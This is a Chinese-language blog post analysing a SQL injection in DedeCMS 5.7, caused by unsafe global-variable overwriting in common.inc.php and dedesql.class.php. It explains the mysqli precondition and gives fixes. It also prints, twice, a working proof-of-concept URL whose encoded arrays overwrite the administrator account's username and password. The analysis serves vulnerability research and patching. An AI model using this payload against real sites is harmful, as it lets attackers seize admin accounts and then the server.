最近看到網(wǎng)上曝出的dedecms最新版本的一個(gè)注入漏洞利用，漏洞PoC和分析文章也已在網(wǎng)上公開.但是在我實(shí)際測(cè)試過程當(dāng)中，發(fā)現(xiàn)無(wú)法復(fù)現(xiàn)。原因是此漏洞的利用需要一定的前提條件，而原分析文章當(dāng)中并沒有交代這些，所以這里將我的分析過程以及一些觸發(fā)的必要條件總結(jié)了一下。

一. 漏洞跟蹤

發(fā)布時(shí)間：2013年6月7日

漏洞描述：

DedeCMS是一個(gè)網(wǎng)站應(yīng)用系統(tǒng)構(gòu)建平臺(tái)，也是一個(gè)強(qiáng)大的網(wǎng)站內(nèi)容管理系統(tǒng)。基于PHP+MySQL的技術(shù)架構(gòu)，完全開源加上強(qiáng)大穩(wěn)定的技術(shù)架構(gòu)，既可以用來(lái)構(gòu)建復(fù)雜體系的企業(yè)信息門戶或電子商務(wù)網(wǎng)站平臺(tái)，也可以用來(lái)管理簡(jiǎn)單內(nèi)容發(fā)布網(wǎng)站，不管是商務(wù)資源門戶還是娛樂信息門戶，它都是您管理網(wǎng)站的好幫手。

漏洞觸發(fā)的根源在于dedesql.class.php在調(diào)用$GLOBALS[‘arrs1’]、$GLOBALS[‘arrs1’]這兩個(gè)全局變量之前未對(duì)其進(jìn)行初始化，導(dǎo)致能夠覆蓋任意全局變量。

漏洞危害：因?yàn)閐edecms的使用非常廣泛，而此漏洞利用方便，危害性高，能夠遠(yuǎn)程獲取管理后臺(tái)，進(jìn)而直接getshell獲取系統(tǒng)控制權(quán)。

觸發(fā)條件：確保php.ini中使用php_mysql.dll同時(shí)未開啟php_mysqli.dll，

如圖所示：

受影響版本：dedecms 5.7

二. 漏洞原理

首先說一下dedecms不安全的參數(shù)處理機(jī)制，這里我們看一下/include/common.inc.php代碼的第79行：

foreach(Array(‘_GET’,'_POST’,'_COOKIE’) as $_request)

      {

             foreach($$_request as $_k => $_v)

            {

                    if($_k == ‘nvarname’) ${$_k} = $_v;

                   else ${$_k} = _RunMagicQuotes($_v);

            }

      }

萬(wàn)惡之源其實(shí)就在這里，基本上目前dede被發(fā)現(xiàn)的漏洞全都死在這里。我們可以看到，程序從GPC數(shù)組中取出名值對(duì)后，只是對(duì)$_v做了簡(jiǎn)單的addslashes處理，就直接賦給了${$_k}，實(shí)現(xiàn)了類似全局變量覆蓋的機(jī)制，設(shè)計(jì)的初衷是為了開發(fā)方便，但卻存在著嚴(yán)重的安全問題。PHP在經(jīng)歷了這么多年的更新?lián)Q代終于修補(bǔ)了register_globals問題，但是dede的這段代碼使php付出的努力全部白費(fèi)。

下面我們回歸漏洞。

首先是/include/dedesql.class.php的第589-600行，

在執(zhí)行這段代碼之前，程序未初始化$arrs1和$arrs2這兩個(gè)數(shù)組。結(jié)合前面提到的dede不安全的參數(shù)處理機(jī)制，利用這段代碼我們可以覆蓋任意全局變量。例如在這個(gè)漏洞中，我們可以控制$GLOBALS['cfg_dbprefix']的值。

然后，我們來(lái)看一下如何利用$GLOBALS['cfg_dbprefix']。

這里在/include/dedesql.class.php的第512行SetQuery函數(shù)中，代碼如下

這里因?yàn)?GLOBALS['cfg_dbprefix']是可控的，進(jìn)而$prefix也是可控的，所以在這兒就造成了SQL注入。

下面跟蹤一下整個(gè)漏洞的觸發(fā)過程，這是網(wǎng)上已經(jīng)公開的PoC：

http://localhost/dedecms5.7/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=116&arrs2[]=101&arrs2[]=115&arrs2[]=116&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

首先看這個(gè)if判斷，意思是如果開啟了mysqli擴(kuò)展，則包含dedesqli.class.php。這里存在漏洞的代碼在dedesql.class.php中，所以漏洞利用的前提條件是必須關(guān)閉mysqli擴(kuò)展。

這里跟入dedesql.class.php代碼，如圖

這里我們傳入的arrs1、arrs2兩個(gè)數(shù)組因?yàn)檫€沒有被初始化，所以這里$v1、$v2拼接為字符串，如圖所示

所以執(zhí)行到這里$GLOBALS['cfg_dbprefix']被覆蓋為

admin` SET `userid`=’test’, `pwd`=’f297a57a5a743894a0e4′ where id=1 #

繼續(xù)跟蹤代碼執(zhí)行，

跟入ExecuteNoneQuery2函數(shù)，一直跟進(jìn)SetQuery，如圖

這里因?yàn)?GLOBALS['cfg_dbprefix']是我們可控的，所以就造成了注入，這里看一下$sql的值，如圖所示

因?yàn)镋xecuteNoneQuery2函數(shù)沒有使用mysql-ids進(jìn)行過濾，所以這里借助它來(lái)注入。執(zhí)行update成功之后，后臺(tái)賬戶為test，密碼為admin。

三. 漏洞驗(yàn)證

PoC：

http://localhost/dedecms5.7/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=116&arrs2[]=101&arrs2[]=115&arrs2[]=116&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

驗(yàn)證截圖：

四. 漏洞修復(fù)

0×01、修改php.ini，確保開啟php_mysqli.dll擴(kuò)展。

0×02、修改/include/dedesql.class.php中的代碼，如下所示

require_once(DEDEINC.’/common.func.php’);

//引入數(shù)據(jù)庫(kù)類

if ($GLOBALS['cfg_mysql_type'] == ‘mysqli’ && function_exists(“mysqli_init”))

{

        //echo $GLOBALS['cfg_mysql_type'];

       //exit;

       require_once(DEDEINC.’/dedesqli.class.php’);

} else {

        require_once(DEDEINC.’/dedesql.class.php’);

}

//require_once(DEDEINC.’/common.func.php’);

最新評(píng)論